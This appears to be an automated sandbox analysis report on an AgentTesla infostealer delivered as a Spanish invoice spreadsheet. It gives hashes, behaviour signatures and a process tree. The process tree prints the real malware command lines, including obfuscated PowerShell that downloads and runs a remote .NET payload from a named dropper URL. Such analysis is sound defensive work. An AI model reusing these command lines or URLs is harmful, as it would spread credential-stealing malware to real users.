Overview

overview

10

Static

static

1

FACTURA Y ...S.xlsx

windows7-x64

10

FACTURA Y ...S.xlsx

windows10-2004-x64

1

Analysis

  • max time kernel
    102s
  • max time network
    32s
  • platform
    windows7_x64
  • resource
    win7-20230703-en
  • resource tags

    arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system
  • submitted
    04-07-2023 15:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    FACTURA Y DATOS BANCARIOS.xlsx

  • Size

    855KB

  • MD5

    47bd19f558a74fc037bcf111c5dd387f

  • SHA1

    b7e2c5f0e8d6a898148f338ac626e924e74f437c

  • SHA256

    71a0ef3bd50d79be4102f44b986804201125803c2476b37635687990b07b092b

  • SHA512

    04bb74797a32d3ad112d91c2b36764f3ba861c6197deb49657e9488b64ac22897523146a248772154bbc9eb36ca9f3a909a1fe0e56b07ec5cd8a17eb976aaa58

  • SSDEEP

    12288:zML7nvXmvC+J2C5jmeva+JB9GL7OnzZXppEiCS/e3PDKxIY+nwHGNFNXGb8LvNMH:amvCEV1vTvKin3yd0/kxPS8hMOK85MF

Score
10/10
agentteslacollectionkeyloggerspywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://cryptersandtools.minhacasa.tv/e/e

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Blocklisted process makes network request 3 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

    exploit
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\FACTURA Y DATOS BANCARIOS.xlsx"
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1748
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:1892
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\zstiposyh.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2264
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂GM⁂cgB5⁂H⁂⁂d⁂Bl⁂HI⁂cwBh⁂G4⁂Z⁂B0⁂G8⁂bwBs⁂HM⁂LgBt⁂Gk⁂bgBo⁂GE⁂YwBh⁂HM⁂YQ⁂u⁂HQ⁂dg⁂v⁂GU⁂LwBl⁂Cc⁂KQ⁂p⁂Ds⁂WwBT⁂Hk⁂cwB0⁂GU⁂bQ⁂u⁂EE⁂c⁂Bw⁂EQ⁂bwBt⁂GE⁂aQBu⁂F0⁂Og⁂6⁂EM⁂dQBy⁂HI⁂ZQBu⁂HQ⁂R⁂Bv⁂G0⁂YQBp⁂G4⁂LgBM⁂G8⁂YQBk⁂Cg⁂J⁂BE⁂Ew⁂T⁂⁂p⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂LgBH⁂GU⁂d⁂BN⁂GU⁂d⁂Bo⁂G8⁂Z⁂⁂o⁂Cc⁂VgBB⁂Ek⁂Jw⁂p⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂Fs⁂bwBi⁂Go⁂ZQBj⁂HQ⁂WwBd⁂F0⁂I⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgBz⁂GU⁂bgB5⁂G0⁂Lw⁂1⁂DU⁂Lg⁂5⁂DQ⁂Lg⁂w⁂DE⁂MQ⁂u⁂Dk⁂Nw⁂v⁂C8⁂OgBw⁂HQ⁂d⁂Bo⁂Cc⁂KQ⁂p⁂⁂==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1360
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://cryptersandtools.minhacasa.tv/e/e'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.senym/55.94.011.97//:ptth'))"
          4⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3068
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            5⤵
            • Accesses Microsoft Outlook profiles
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:2448

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TP67ZNK4MIAVTK7TL0CC.temp
    Filesize

    7KB

    MD5

    61ff1497f519750d13d08c841e0ad128

    SHA1

    b928564cc1e91efcba1e831a2eea418c3d9471a5

    SHA256

    7fb627e0b4b64f45a491fa3fb49f9fc073a203950d3f593ab63493d678d712e9

    SHA512

    9fd930a03336defcf568ec3c4ba09de36226b0b9610ae31bfcf43eda260acda0536c8f2d8ee34672a352492de30bf05ba2e373cb7437d95e2367eb950cde26e0

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    61ff1497f519750d13d08c841e0ad128

    SHA1

    b928564cc1e91efcba1e831a2eea418c3d9471a5

    SHA256

    7fb627e0b4b64f45a491fa3fb49f9fc073a203950d3f593ab63493d678d712e9

    SHA512

    9fd930a03336defcf568ec3c4ba09de36226b0b9610ae31bfcf43eda260acda0536c8f2d8ee34672a352492de30bf05ba2e373cb7437d95e2367eb950cde26e0

    Download Submit

  • C:\Users\Admin\AppData\Roaming\zstiposyh.vbs
    Filesize

    318KB

    MD5

    84d15dddd6d6d156f0b26f47c2584852

    SHA1

    319380fde57c61c6532e8ed0a3c80537184c7aa9

    SHA256

    34543c948a378da9bf0c72d96c99b7b0e1792829ca1e90f8b3cfd5269b7db4b3

    SHA512

    ead34cd60d0e8301a0a9f82597e185e0c44c35adee66040e0bcd17a14ce89e3b3dc0fec299ca7a6e596bd93397b4c9a7e33ec8385144d2a0dec93e4525efea5d

    Download Submit

  • C:\Users\Admin\AppData\Roaming\zstiposyh.vbs
    Filesize

    318KB

    MD5

    84d15dddd6d6d156f0b26f47c2584852

    SHA1

    319380fde57c61c6532e8ed0a3c80537184c7aa9

    SHA256

    34543c948a378da9bf0c72d96c99b7b0e1792829ca1e90f8b3cfd5269b7db4b3

    SHA512

    ead34cd60d0e8301a0a9f82597e185e0c44c35adee66040e0bcd17a14ce89e3b3dc0fec299ca7a6e596bd93397b4c9a7e33ec8385144d2a0dec93e4525efea5d

    Download Submit

  • memory/1360-65-0x00000000026E0000-0x0000000002720000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1748-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2448-145-0x0000000004EF0000-0x0000000004F30000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2448-144-0x0000000004EF0000-0x0000000004F30000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2448-143-0x0000000000400000-0x0000000000430000-memory.dmp

    Filesize

    192KB

    Download

  • memory/2448-134-0x0000000000400000-0x0000000000430000-memory.dmp

    Filesize

    192KB

    Download

  • memory/2448-135-0x0000000000400000-0x0000000000430000-memory.dmp

    Filesize

    192KB

    Download

  • memory/2448-133-0x0000000000400000-0x0000000000430000-memory.dmp

    Filesize

    192KB

    Download

  • memory/3068-121-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-99-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-107-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-111-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-117-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-125-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-131-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-129-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-127-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-123-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-95-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-119-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-115-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-113-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-109-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-105-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-103-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-101-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-97-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-93-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-91-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-87-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-85-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-81-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-77-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-75-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-72-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-132-0x0000000004FE0000-0x0000000004FE1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3068-89-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-83-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-79-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-73-0x0000000004FA0000-0x0000000004FC0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3068-71-0x0000000002450000-0x0000000002490000-memory.dmp

    Filesize

    256KB

    Download

  • memory/3068-70-0x0000000002450000-0x0000000002490000-memory.dmp

    Filesize

    256KB

    Download